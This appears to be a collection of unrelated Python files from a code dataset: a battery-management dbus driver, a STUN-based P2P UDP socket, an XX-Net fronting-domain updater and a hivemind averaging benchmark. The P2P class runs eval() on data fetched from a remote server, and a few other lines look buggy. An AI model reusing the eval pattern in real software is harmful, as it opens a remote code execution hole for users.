self._dbusservice["/System/MinCellTemperature"] = self._BMS.lowest_cell_temperature
self._dbusservice["/System/MinTemperatureCellId"] = self._BMS.lowest_cell_temperature_num
self._dbusservice["/System/MaxCellTemperature"] = self._BMS.highest_cell_temperature
self._dbusservice["/System/MaxTemperatureCellId"] = self._BMS.highest_cell_temperature_num
self._dbusservice["/System/NrOfModulesOnline"] = 1
self._dbusservice["/System/NrOfModulesOffline"] = 0
self._dbusservice["/System/NrOfModulesBlockingCharge"] = int(not self._BMS.allowed_to_charge)
self._dbusservice["/System/NrOfModulesBlockingDischarge"] = int(not self._BMS.allowed_to_discharge)
self._dbusservice["/Alarms/LowVoltage"] = int(self._BMS.alarm_minimum_voltage)
self._dbusservice["/Alarms/HighVoltage"] = int(self._BMS.alarm_maximum_voltage)
self._dbusservice["/Alarms/LowTemperature"] = int(self._BMS.alarm_minimum_temperature)
self._dbusservice["/Alarms/HighTemperature"] = int(self._BMS.alarm_maximum_temperature)
nominal_pack_voltage = self._BMS.determine_nominal_voltage()*self._BMS.cell_count
# If no nominal pack voltage could be determined, just use current pack voltage
if(nominal_pack_voltage == 0): nominal_pack_voltage = self._BMS.pack_voltage
consumed_amp_hours = round(-1*(self._BMS.capacity*1000-self._BMS.energy_stored)/nominal_pack_voltage,1)
if(consumed_amp_hours < 0.1): consumed_amp_hours = 0 # Convert negative zero to zero
self._dbusservice["/ConsumedAmphours"] = consumed_amp_hours
# Filter current with a 3 minute moving average filter to stabilize the time-to-go
if(len(self._current_filter) >= 180):
self._current_filter.popleft()
self._current_filter.append(self._BMS.pack_current)
current_filter_sum = 0
for value in self._current_filter:
current_filter_sum += value
current_filter_average = current_filter_sum/len(self._current_filter)
if current_filter_average < 0:
self._dbusservice['/TimeToGo'] = (self._BMS.soc*self._BMS.capacity * 10) * 60 * 60 / (self._BMS.pack_voltage * -1 * current_filter_average)
else:
self._dbusservice['/TimeToGo'] = None
if(self._BMS.alarm_serial_communication and not self._comm_error_shadow):
self._comm_error_shadow = True
print('Serial comm error')
if(self._BMS.alarm_serial_communication and self._comm_error_shadow):
self._comm_error_shadow = False
print('Serial comm restored')
self._BMS.lock.release()
def _settext(self, path, value): # Currently only used for CustomName
self._settings['CustomName'] = value
return True
def _gettext(self, path, value):
item = self._gettexts.get(path)
if item is not None:
return item['gettext'] % value
return str(value)
# Currently nothing has to be done with the saved setting
def _handle_setting_changed(self, setting, oldvalue, newvalue):
return True
def _settings_register(self):
# Load all persistent data
self._settings = SettingsDevice(
dbus.SessionBus() if 'DBUS_SESSION_BUS_ADDRESS' in os.environ else dbus.SystemBus(),
supportedSettings={
'CustomName': ['/Settings/123electric/Products/'+ self._serial_id + '/CustomName', self._info['name'], 0, 0]
},
eventCallback = self._handle_setting_changed)
# Called on a one second timer
def handle_timer_tick():
SmartBMSDbus.update()
return True # keep timer running
if __name__ == "__main__":
# Have a mainloop, so we can send/receive asynchronous calls to and from dbus
print('123\\SmartBMS to dbus started')
DBusGMainLoop(set_as_default=True)
parser = argparse.ArgumentParser(description = '123SmartBMS to dbus')
requiredArguments = parser.add_argument_group('required arguments')
requiredArguments.add_argument('-d', '--device', help='serial device for data (eg /dev/ttyUSB0)', required=True)
args = parser.parse_args()
dev_objects = serial.tools.list_ports.comports()
device_serial_numbers = {}
for d in dev_objects:
device_serial_numbers[d.device] = d.serial_number
SmartBMSDbus = SmartBMSDbus(args.device, device_serial_numbers[args.device])
time.sleep(3) # Wait until we have received some data
GLib.timeout_add(1000, lambda: ve_utils.exit_on_error(handle_timer_tick))
mainloop = GLib.MainLoop()
mainloop.run()
|
P2PUDPSocket.py
|
import sys
import socket as sk
import urllib.parse
import urllib.request
import time
import threading
try:
import stun
except:
print('Install stun with')
print('pip install pystun3')
sys.exit(1)
# PUBLIC stun host can be found by googling ... or similar words.
# https://gist.github.com/sagivo/3a4b2f2c7ac6e1b5267c2f1f59ac6c6b
class P2PUDPSocket:
get_url = 'https://psycox3.pythonanywhere.com/getall'
clear_url = 'https://psycox3.pythonanywhere.com/clear'
add_url = 'https://psycox3.pythonanywhere.com/addinfo'
DEINIT = 0
CONNECTING = 1
CONNECTED = 2
def __init__(self, me, other, logger, local_port=65432, stun_host='stun.l.google.com', stun_port=19302):
self.me = me
self.other = other
self.logger = logger
self.stun_host = stun_host
self.stun_port = stun_port
self.lport = local_port
self.lhost = '0.0.0.0'
self.eip = None
self.eport = None
self.ss = None
self.oip = None
self.oport = None
self.recvTh = None
self.termRecvTh = False
self.state = P2PUDPSocket.DEINIT
def connect(self):
nat_type, eip, eport = stun.get_ip_info(source_ip=self.lhost, source_port=self.lport,
stun_host=self.stun_host, stun_port=self.stun_port)
#print(type(self.logger))
self.logger(f'{nat_type}')
self.logger(f'({self.lhost}, {self.lport}) -> ({eip}, {eport})')
if eport is None:
self.logger(f'Unable to find external Port')
return None
self.eip = eip
self.eport = eport
self.ss = sk.socket(sk.AF_INET, sk.SOCK_DGRAM)
self.ss.setsockopt(sk.SOL_SOCKET, sk.SO_REUSEADDR, 1)
self.ss.bind((self.lhost, self.lport))
self.clearServerCache()
availClients = {}
while self.other not in availClients:
self.SendKeepAlive()
self.UpdateInfo()
time.sleep(1)
availClients = self.getAvailClients()
self.oip, self.oport = availClients[self.other]
try:
self.oport = int(self.oport)
except:
self.logger(f'Invalid port {self.oport} for {self.other}')
return None
self.logger(f'Starting recv thread')
self.startRecv()
self.logger(f'Trying to connect to ({self.oip}, {self.oport})')
counter = 0
while counter < 6:
msg = f'{self.me} says HELLO {counter}'.encode()
self.logger(f"Sending {msg}")
self.ss.sendto(msg, (self.oip, self.oport))
#data, addr = self.ss.recvfrom(1024)
#self.logger(f'From: {addr} -> {data.decode()}')
counter = counter + 1
time.sleep(1)
self.logger('Exiting')
def __recvLoop(self):
helo_msg = f'{self.other} says HELLO '
while self.termRecvTh:
data, addr = self.ss.recvfrom(1024)
data = data.decode()
self.logger(f'From: {addr} -> {data}')
if data.startswith(helo_msg):
self.state = P2PUDPSocket.CONNECTED
def startRecv(self):
self.recvTh = threading.Thread(target=self.__recvLoop, daemon=True)
self.termRecvTh = True
self.recvTh.start()
def clearServerCache(self):
r = urllib.request.urlopen(P2PUDPSocket.clear_url)
def getAvailClients(self):
r = urllib.request.urlopen(P2PUDPSocket.get_url)
data = r.read().decode()
self.logger(f'clients -> {data}')
# ToDo: don't use eval. It's security risk.
return eval(data)
def UpdateInfo(self):
data = urllib.parse.urlencode({'name': self.me, 'port': str(self.lport)})
data = data.encode('ascii')
#add_url = 'https://psycox3.pythonanywhere.com/addinfo'
res = urllib.request.urlopen(P2PUDPSocket.add_url, data)
self.logger(res.read().decode())
def SendKeepAlive(self):
self.ss.sendto('loopback Keep-Alive'.encode(), (self.eip, self.eport))
data, addr = self.ss.recvfrom(1024)
self.logger(f'From: {addr} -> {data.decode()}')
def sendBytes(self, data: bytes):
self.ss.sendto(data, (self.oip, self.oport))
print(f'Sending {data} to', (self.oip, self.oport))
def disconnect(self):
self.termRecvTh = False
# self.recvTh.join()
|
host_manager.py
|
import random
import os
import json
import time
import threading
import simple_http_client
from front_base.host_manager import HostManagerBase
class HostManager(HostManagerBase):
def __init__(self, config, logger, default_fn, fn, front):
self.config = config
self.logger = logger
self.default_fn = default_fn
self.fn = fn
self.front = front
self.load()
if self.config.update_domains:
threading.Thread(target=self.update_front_domains).start()
def load(self):
for fn in [self.fn, self.default_fn]:
if not os.path.isfile(self.fn):
continue
lns = []
try:
with open(fn, "r") as fd:
ds = json.load(fd)
for top in ds:
subs = ds[top]
subs = [str(s) for s in subs]
lns.append([str(top), subs])
self.ns = lns
self.logger.info("load %s success", fn)
return True
except Exception as e:
self.logger.warn("load %s for host fail.", fn)
def get_sni_host(self, ip):
top_domain, subs = random.choice(self.ns)
sni = random.choice(subs)
return sni, top_domain
def update_front_domains(self):
next_update_time = time.time()
while self.front.running:
if time.time() < next_update_time:
time.sleep(4)
continue
try:
timeout = 30
if self.config.PROXY_ENABLE:
client = simple_http_client.Client(proxy={
"type": self.config.PROXY_TYPE,
"host": self.config.PROXY_HOST,
"port": self.config.PROXY_PORT,
"user": self.config.PROXY_USER,
"pass": self.config.PROXY_PASSWD,
}, timeout=timeout)
else:
client = simple_http_client.Client(timeout=timeout)
url = "https://raw.githubusercontent.com/XX-net/XX-Net/master/code/default/x_tunnel/local/cloudflare_front/front_domains.json"
response = client.request("GET", url)
if not response or response.status != 200:
if response:
self.logger.warn("update front domains fail:%d", response.status)
next_update_time = time.time() + (1800)
continue
content = response.text
if isinstance(content, memoryview):
content = content.tobytes()
need_update = True
front_domains_fn = self.fn
if os.path.exists(front_domains_fn):
with open(front_domains_fn, "r") as fd:
old_content = fd.read()
if content == old_content:
need_update = False
if need_update:
with open(front_domains_fn, "w") as fd:
fd.write(content)
self.load()
self.logger.info("updated cloudflare front domains from github.")
next_update_time = time.time() + (4 * 3600)
except Exception as e:
next_update_time = time.time() + (1800)
self.logger.exception("updated cloudflare front domains from github fail:%r", e)
|
benchmark_averaging.py
|
import math
import time
import threading
import argparse
import torch
import hivemind
from hivemind.utils import LOCALHOST, increase_file_limit, get_logger
from hivemind.proto import runtime_pb2
logger = get_logger(__name__)
def sample_tensors(hid_size, num_layers):
tensors = []
for i in range(num_layers):
tensors.append(torch.randn(hid_size, 3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(hid_size, hid_size))
tensors.append(torch.ones(hid_size))
tensors.append(torch.zeros(hid_size))
tensors.append(torch.randn(hid_size, 4 * hid_size))
tensors.append(torch.randn(4 * hid_size))
tensors.append(torch.ones(4 * hid_size))
tensors.append(torch.randn(2, hid_size, hid_size, 2))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
return tuple(tensors)
def benchmark_averaging(num_peers: int, target_group_size: int, num_rounds: int,
averaging_expiration: float, request_timeout: float, round_timeout: float,
hid_size: int, num_layers: int, spawn_dtime: float):
dht_root = hivemind.DHT(listen_on=f'{LOCALHOST}:*', start=True)
num_groups = 2 ** int(round(math.log2(num_peers / target_group_size)))
nbits = int(round(math.log2(num_groups)))
peer_tensors = [sample_tensors(hid_size, num_layers)
for _ in range(num_peers)]
processes = {dht_root}
lock_stats = threading.Lock()
successful_steps = total_steps = 0
def run_averager(index):
nonlocal successful_steps, total_steps, lock_stats
dht = hivemind.DHT(listen_on=f'{LOCALHOST}:*',
initial_peers=[f"{LOCALHOST}:{dht_root.port}"],
start=True)
initial_bits = bin(index % num_groups)[2:].rjust(nbits, '0')
averager = hivemind.DecentralizedAverager(
peer_tensors[i], dht, prefix='my_tensor', initial_group_bits=initial_bits, listen_on=f"{LOCALHOST}:*",
compression_type=runtime_pb2.CompressionType.FLOAT16, target_group_size=target_group_size,
averaging_expiration=averaging_expiration, request_timeout=request_timeout, start=True)
processes.update({dht, averager})
logger.info(f'Averager {index}: started on endpoint {averager.endpoint}, group_bits: {averager.get_group_bits()}')
for step in range(num_rounds):
try:
success = averager.step(timeout=round_timeout) is not None
except:
success = False
with lock_stats:
successful_steps += int(success)
total_steps += 1
logger.info(f"Averager {index}: {'finished' if success else 'failed'} step {step}")
logger.info(f"Averager {index}: done.")
threads = []
for i in range(num_peers):
thread = threading.Thread(target=run_averager, args=[i])
threads.append(thread)
thread.start()
time.sleep(spawn_dtime)
t = time.time()
for thread in threads:
thread.join()
logger.info(f"Benchmark finished in {time.time() - t:.3f} seconds.")
logger.info(f"Success rate: {successful_steps / total_steps} ({successful_steps} out of {total_steps} attempts)")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--num_peers', type=int, default=16, required=False)
parser.add_argument('--target_group_size', type=int, default=4, required=False)
parser.add_argument('--num_rounds', type=int, default=5, required=False)
parser.add_argument('--hid_size', type=int, default=256, required=False)
parser.add_argument('--num_layers', type=int, default=3, required=False)
parser.add_argument('--averaging_expiration', type=float, default=5, required=False)
parser.add_argument('--round_timeout', type=float, default=15, required=False)
parser.add_argument('--request_timeout', type=float, default=1, required=False)
parser.add_argument('--spawn_dtime', type=float, default=0.1, required=False)
parser.add_argument('--increase_file_limit', action="store_true")
args = vars(parser.parse_args())
if args.pop('increase_file_limit', False):
increase_file_limit()
benchmark_averaging(**args)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.